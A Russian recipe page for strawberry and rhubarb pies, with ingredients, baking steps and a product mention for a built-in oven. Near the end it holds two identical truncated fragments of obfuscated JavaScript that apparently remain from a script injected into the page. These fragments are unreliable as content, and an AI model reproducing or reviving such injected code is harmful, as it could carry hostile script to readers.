Пирожки с клубникой и ревенем

В сезон клубники просто необходимо испечь эти невероятно вкусные пирожки. Готовятся они просто и элементарно, но предупреждаю сразу, делайте двойную, а то и тройную порцию, а то не успеете оглянуться, а их уже и след простыл! Потрясающее тесто, рассыпчатое тает во рту,а внутри сочная и ароматная начинка, устоять просто невозможно!

И без встроенной духовки Gorenje BO 53 CLI я б не справилась!

Ингредиенты:

1.Мука 125 грамм

2.Масло сливочное 120 грамм

3.Сахар 3 ст.л.

4.Яйцо 1 шт.

5.Молоко 1 ст.л.

6.Сок лимона 1 ст.л.

7.Клубника 100 грамм

8.Ревень 100 грамм

9.Соль

Готовим!

  • Просеять муку. Добавить к ней 1 ст.л. сахара и щепотку соли и высыпать смесь в блендер. Добавить 110 грамм нарезанного кубиками холодного сливочного масла и переработать смесь в крошку.
  • Яйцо разболтать вилкой в миске. Половину яйца добавить в тесто вместе с молоком и мешать до однородности. Завернуть тесто в пленку, расплющить в лепешку и убрать в холдильник на 1 час.
  • Для начинки клубнику очистить и разрезать пополам. Ревень нарезать небольшими кусочками. При отсутствии ревеня можно использовать одну клубнику. В маленьком сотейнике растопить 10 грамм сливочного масла и высыпать в него клубнику и ревень. Готовить на небольшом огне 10 минут. Всыпать 2 ст.л. сахара и влить лимонный сок и варить еще 3 минуты. Остудить начинку.
  • Тесто тонко раскатать на посыпанной мукой поверхности и нарезать прямоугольниками. Обрезки собрать и снова раскатать. Края каждого прямоугольника смазать оставшимся яйцом, положить клубничную начинку на одну половину и нкрыть второй. Прижать края вилкой и смазать верх пирожков оставшимся разболтанным яйцом.
  • Выложить пирожки на противень, покрытый пергаментом и выпекать 20 минут при температуре 200 градусов.
  •  

    // o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=»»,o=0;o

    // o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=»»,o=0;o

    Читайте также:

    Добавить комментарий

    Ваш e-mail не будет опубликован. Обязательные поля помечены *